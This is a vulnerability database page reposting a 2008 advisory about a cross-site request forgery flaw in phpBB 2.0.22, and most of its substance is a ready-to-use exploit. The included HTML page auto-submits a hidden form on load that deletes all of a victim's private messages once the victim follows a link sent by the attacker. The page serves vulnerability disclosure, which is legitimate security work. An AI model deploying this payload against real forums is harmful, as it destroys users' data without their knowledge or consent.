Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18945
HistoryJan 25, 2008 - 12:00 a.m.

phpBB 2.0.22 Remote PM Delete XSRF Vulnerability

2008-01-2500:00:00
vulners.com
24
JSON

################################################################
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability
by NBBN Type: Cross-Site Request Forgery
Founded: December 2007
################################################################

An attacker can send a link via pm to a site with the follow html code to a
victim and all victim's pm's are going to be deleted when he click the link.
######Code##########################################################

<html>
<head>
</head>
<body onLoad=javascript:document.xsrf.submit()>

<form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post"
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">

</body>
</html>
#####################################################################

######Vuln Versions:#####################

I've tested it only on 2.0.22 but I think that all versions of 2 are vuln.

(Sorry my bad english :-) )

JSON